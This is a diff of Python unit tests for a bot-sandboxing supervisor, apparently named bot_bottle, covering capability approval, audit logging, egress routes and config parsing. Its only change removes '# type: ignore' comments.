@@ -433,7 +433,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
) )
def test_no_audit_log_for_capability(self): def test_no_audit_log_for_capability(self):
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
qp = self._enqueue_capability() qp = self._enqueue_capability()
supervise_cli.approve(qp) supervise_cli.approve(qp)
# capability-block has no audit log per PRD 0013 — its record # capability-block has no audit log per PRD 0013 — its record
@@ -442,7 +442,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("pipelock", "dev")) self.assertEqual([], read_audit_entries("pipelock", "dev"))
def test_proposal_archived_after_apply(self): def test_proposal_archived_after_apply(self):
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
qp = self._enqueue_capability() qp = self._enqueue_capability()
supervise_cli.approve(qp) supervise_cli.approve(qp)
# Sidecar would normally archive after delivering the response, # Sidecar would normally archive after delivering the response,
@@ -517,7 +517,7 @@ class TestCapabilityBlockSmolmachinesGuard(_FakeHomeMixin, unittest.TestCase):
def setUp(self): def setUp(self):
self._setup_fake_home() self._setup_fake_home()
self._original_apply_capability = supervise_cli.apply_capability_change self._original_apply_capability = supervise_cli.apply_capability_change
supervise_cli.apply_capability_change = lambda slug, content: ("", content) # type: ignore supervise_cli.apply_capability_change = lambda slug, content: ("", content)
def tearDown(self): def tearDown(self):
supervise_cli.apply_capability_change = self._original_apply_capability supervise_cli.apply_capability_change = self._original_apply_capability
+2 -2
View File
@@ -16,7 +16,7 @@ from unittest.mock import patch
# we mirror that by injecting bot_bottle/ onto sys.path under the # we mirror that by injecting bot_bottle/ onto sys.path under the
# bare name `supervise`. # bare name `supervise`.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / "bot_bottle")) sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / "bot_bottle"))
import supervise as _sv # noqa: E402 # type: ignore import supervise as _sv # noqa: E402
from bot_bottle import supervise_server # noqa: E402 from bot_bottle import supervise_server # noqa: E402
from bot_bottle.supervise_server import ( from bot_bottle.supervise_server import (
@@ -330,7 +330,7 @@ class TestHandleToolsCall(unittest.TestCase):
class TestHandleListEgressRoutes(unittest.TestCase): class TestHandleListEgressRoutes(unittest.TestCase):
def test_url_error_returns_tool_error(self): def test_url_error_returns_tool_error(self):
class _Opener: class _Opener:
def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003 # type: ignore def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003
raise OSError("egress unavailable") raise OSError("egress unavailable")
with patch.object(supervise_server.urllib.request, "build_opener", return_value=_Opener()): with patch.object(supervise_server.urllib.request, "build_opener", return_value=_Opener()):
+4 -4
View File
@@ -273,18 +273,18 @@ class TestRealisticBottleFile(unittest.TestCase):
KnownHostKey: ssh-ed25519 AAAA... KnownHostKey: ssh-ed25519 AAAA...
""") """)
# Spot-check the deep parts; the structure is large. # Spot-check the deep parts; the structure is large.
self.assertEqual(2, len(out["egress"]["routes"])) # type: ignore self.assertEqual(2, len(out["egress"]["routes"]))
self.assertEqual( self.assertEqual(
["/didericis/"], ["/didericis/"],
out["egress"]["routes"][1]["path_allowlist"], # type: ignore out["egress"]["routes"][1]["path_allowlist"],
) )
self.assertEqual( self.assertEqual(
"Bearer", "Bearer",
out["egress"]["routes"][0]["auth"]["scheme"], # type: ignore out["egress"]["routes"][0]["auth"]["scheme"],
) )
self.assertEqual( self.assertEqual(
"ssh-ed25519 AAAA...", "ssh-ed25519 AAAA...",
out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"], # type: ignore out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"],
) )